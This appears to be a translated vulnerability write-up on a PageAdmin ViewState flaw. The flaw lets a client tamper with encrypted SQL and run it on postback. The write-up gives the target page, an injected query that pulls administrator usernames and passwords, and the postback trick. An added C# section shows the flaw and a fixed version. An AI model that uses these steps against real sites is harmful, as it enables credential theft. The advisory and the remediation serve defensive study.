PageAdmin ViewState flaw leads to SQL injection

Vulnerability author: Damo

Detailed analysis:

1. Find a dynamic page, for example:
/e/aspx/data_select.aspx
Parameters:
siteid=1&table=article&field=1&multiple=&sortid=&keyword=&pagesize=2
(screenshot)
View the page source to find the aspNetHidden content.
Decoding this encrypted content gives the following:
(screenshot)
So we only need to be able to modify the part circled in red; whatever data we want, we can get.
(screenshot)
Local test, retrieving data from the administrator table; the SQL is the part circled in red:
select username+userpassword as id from pa_member
Note: some readers may wonder why there is an "as id"; look at the page code:
<%#DataBinder.Eval(Container.DataItem,"id")%>"
That is, what gets bound is id, hence "as id". Encrypt the modified data (for the detailed code, see "test code"), then in the browser press F12 and replace the original encrypted string with it.

But at this point readers get anxious: where is the data we fetched? Look here:

if(!Page.IsPostBack) { ViewState["sql"]="select site_id,sort_id,id,title,static_dir,static_file,lanmu_id,sublanmu_id,zdy_url,permissions,checked,[html],thedate from "+TheTable+" where site_id="+SiteId+sql_str+" order by thedate desc"; }

The actual code fragment is here: the SQL is only assigned when the request is not a postback, so we need an event that triggers a postback before the data is fetched. There are two ways:

1. After replacing the original encrypted string, click "next page" and then go back to the first page.
2. Or POST data to this address: /e/aspx/data_select.aspx?siteid=1&table=article&field=1&multiple=&sortid=&keyword=&pagesize=2

At this point readers get anxious again: where is the data, where is the data? The data is here, see below:
(screenshot)
(screenshot)
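The pattern the analysis above describes, as an added example that is not code from PageAdmin or from this write-up: a page that stores the finished SQL statement in ViewState and runs it on postback, beside a rewrite that keeps only the raw inputs in ViewState, re-validates them on every request, picks the table from an allow-list and binds the site id as a parameter. The class names, the table allow-list and ConnString are hypothetical.

```csharp
// Added example (hypothetical, not PageAdmin's code); ConnString is a placeholder.
using System;
using System.Data.SqlClient;
using System.Web;
using System.Web.UI;

public class DataSelectVulnerable : Page
{
    const string ConnString = "<placeholder>";
    // FLAW: the complete SQL statement is saved in ViewState on the first request and
    // executed verbatim on every postback. ViewState is a client-supplied form field, so
    // unless its MAC is enforced a client can substitute any statement it likes.
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!Page.IsPostBack)
            ViewState["sql"] = "select id,title from " + Request["table"] +
                               " where site_id=" + Request["siteid"];
        string sql = (string)ViewState["sql"];   // treated as trusted, but client-controlled
        using (var cn = new SqlConnection(ConnString))
        using (var cmd = new SqlCommand(sql, cn)) { cn.Open(); cmd.ExecuteReader(); }
    }
}

public class DataSelectFixed : Page
{
    const string ConnString = "<placeholder>";
    static readonly string[] AllowedTables = { "pa_article", "pa_news" }; // constructed allow-list
    // FIX: never persist SQL text. Keep only the raw inputs in ViewState, re-validate them
    // on every request, pick the table from an allow-list and bind values as parameters.
    // Also keep enableViewStateMac="true" in web.config so ViewState is integrity-checked.
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!Page.IsPostBack)
        {
            ViewState["table"] = Request["table"];
            ViewState["siteid"] = Request["siteid"];
        }
        string table = ViewState["table"] as string;
        int siteId;
        if (Array.IndexOf(AllowedTables, table) < 0 ||
            !int.TryParse(ViewState["siteid"] as string, out siteId))
            throw new HttpException(400, "invalid parameters");
        string sql = "select id,title from " + table + " where site_id=@siteid";
        using (var cn = new SqlConnection(ConnString))
        using (var cmd = new SqlCommand(sql, cn)) { cmd.Parameters.AddWithValue("@siteid", siteId); cn.Open(); cmd.ExecuteReader(); }
    }
}
```

In the fixed version a tampered ViewState can at most change the table name or site id, and both are re-checked before any SQL is built.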
